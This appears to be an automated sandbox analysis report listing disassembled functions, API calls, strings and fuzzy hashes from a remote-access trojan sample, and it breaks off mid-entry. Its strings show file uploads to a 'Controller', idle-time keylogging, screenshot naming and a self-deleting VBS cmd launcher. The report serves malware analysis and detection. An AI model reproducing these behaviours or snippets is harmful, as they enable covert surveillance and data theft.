                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                          Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                          Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                          • __aulldiv.LIBCMT ref: 00408D88
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                          • API String ID: 3086580692-2582957567
                                          • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                          • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                          Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                          • _free.LIBCMT ref: 0045137F
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004513A1
                                          • _free.LIBCMT ref: 004513B6
                                          • _free.LIBCMT ref: 004513C1
                                          • _free.LIBCMT ref: 004513E3
                                          • _free.LIBCMT ref: 004513F6
                                          • _free.LIBCMT ref: 00451404
                                          • _free.LIBCMT ref: 0045140F
                                          • _free.LIBCMT ref: 00451447
                                          • _free.LIBCMT ref: 0045144E
                                          • _free.LIBCMT ref: 0045146B
                                          • _free.LIBCMT ref: 00451483
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                          Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                          • _free.LIBCMT ref: 10007CFB
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 10007D1D
                                          • _free.LIBCMT ref: 10007D32
                                          • _free.LIBCMT ref: 10007D3D
                                          • _free.LIBCMT ref: 10007D5F
                                          • _free.LIBCMT ref: 10007D72
                                          • _free.LIBCMT ref: 10007D80
                                          • _free.LIBCMT ref: 10007D8B
                                          • _free.LIBCMT ref: 10007DC3
                                          • _free.LIBCMT ref: 10007DCA
                                          • _free.LIBCMT ref: 10007DE7
                                          • _free.LIBCMT ref: 10007DFF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                          Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                          • API String ID: 489098229-1431523004
                                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                          Function 0040A761 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                          • String ID: 8SG$8SG$;p$PG$PG
                                          • API String ID: 3795512280-80952659
                                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                          Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                          • API String ID: 1913171305-3159800282
                                          • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                          • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                          Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                          Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                          • GetLastError.KERNEL32 ref: 00455D6F
                                          • __dosmaperr.LIBCMT ref: 00455D76
                                          • GetFileType.KERNEL32 ref: 00455D82
                                          • GetLastError.KERNEL32 ref: 00455D8C
                                          • __dosmaperr.LIBCMT ref: 00455D95
                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                          • GetLastError.KERNEL32 ref: 00455F31
                                          • __dosmaperr.LIBCMT ref: 00455F38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                          Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: \&G$\&G$`&G
                                          • API String ID: 269201875-253610517
                                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                          Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 65535$udp
                                          • API String ID: 0-1267037602
                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                          Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                          • String ID: [${ User has been idle for $ minutes }$]
                                          • API String ID: 911427763-3954389425
                                          • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                          • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                          Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                          • __dosmaperr.LIBCMT ref: 0043A926
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                          • __dosmaperr.LIBCMT ref: 0043A963
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                          • _free.LIBCMT ref: 0043A9C3
                                          • _free.LIBCMT ref: 0043A9CA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                          Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                          • GetMessageA.USER32 ref: 0040556F
                                          • TranslateMessage.USER32(?), ref: 0040557E
                                          • DispatchMessageA.USER32(?), ref: 00405589
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                          • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                          Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
